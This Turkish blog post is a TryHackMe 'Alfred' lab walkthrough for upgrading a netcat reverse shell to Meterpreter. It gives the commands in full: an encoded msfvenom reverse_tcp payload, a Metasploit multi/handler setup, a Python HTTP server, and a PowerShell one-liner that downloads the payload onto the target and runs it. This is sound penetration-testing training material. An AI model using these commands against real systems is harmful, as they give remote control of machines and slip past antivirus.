Netcat telnet tabanlı komut çalıştırabilme ve dosya alış verişi sağlayan basit bir uygulamadır. Bu uygulama ile yeterince hareket ya da özelliğe sahip olamayız. Özellikle yetki yükseltmesi ya da daha fazla sömürü yapmak istiyorsak güçlü bir payload’a ihtiyacımız olur. Bu ihtiyacımızı Meterpreter ile karşılarız.
Gerçekleştirilen uygulama https://tryhackme.com/room/alfred makinesi üzerinde gerçekleştirilmiştir. Netcat ile bağlantı alındığı varsayılmıştır.
Powershell betiği yardımıyla reverse tcp socket açabildik. Bunun için burada ki betikden yararlanabilirsiniz. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
nc -lvnp 9001
![netcat kullanmak](https://www.asimmisirli.com/wp-content/uploads/2021/09/nc1.png)
Ek olarak hatırlatmak isterim. CMD üzerinde değiliz hedef sistem üzerinde powershell de çalışıyoruz.
Switching Shells , Yetki yükselmeyi kolay hale getirmek için Meterpreter shell kullanacağız.
Msfvenom ile shell oluşturmak
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<ip adresini> LPORT=<port adresiniz> -f exe -o switchshell.exe
![msfvenom ile encoder kullanmak](https://www.asimmisirli.com/wp-content/uploads/2021/09/msfvenom.png)
LHOST , saldırgan ip adresidir. Yani karşı tarafda oluşturduğumu shell tetiklediğimiz zaman istek atılacak ip adresidir.
Multi Handler İle Bağlantıyı Dinlemek
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 10.8.233.100
set lport 443
![multi handler yapılandırması](https://www.asimmisirli.com/wp-content/uploads/2021/09/multilisten.png)
Powershell yardımı ile uzak sunucudan zararlı dosyayı indirmek ve tetiklemek
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.233.100:80/switchshell.exe','switchshell.exe')"
‘switchshell.exe’ sizin oluşturduğunuz isim olmalıdır. Ek olarak msfvenom ile oluşturduğumuz exe dosyasının bulunduğu dizinde python -m SimpleHTTPServer 80 ile web server açılmalıdır.
Yukarıda ki komutumuzu netcat aldığımız oturuma yapıştıralım.
![python simple http server kullanımı](https://www.asimmisirli.com/wp-content/uploads/2021/09/pythonsimple.png)
![powershell ile uzak sunucudan dosya indirmek](https://www.asimmisirli.com/wp-content/uploads/2021/09/ps3.png)
![multi handler kullanımı](https://www.asimmisirli.com/wp-content/uploads/2021/09/meter5.png)
Başarılı bir şekilde Meterpreter’e geçmiş olduk.
Sizde Hackthebox ya da TryHackMe gibi bir çok platformda kullanabileceğiniz kullanışlı ipuçları ya da komutları https://www.asimmisirli.com/makine-cozumlerinde-yaygin-ipucular/ bu adresden bulabilirsiniz.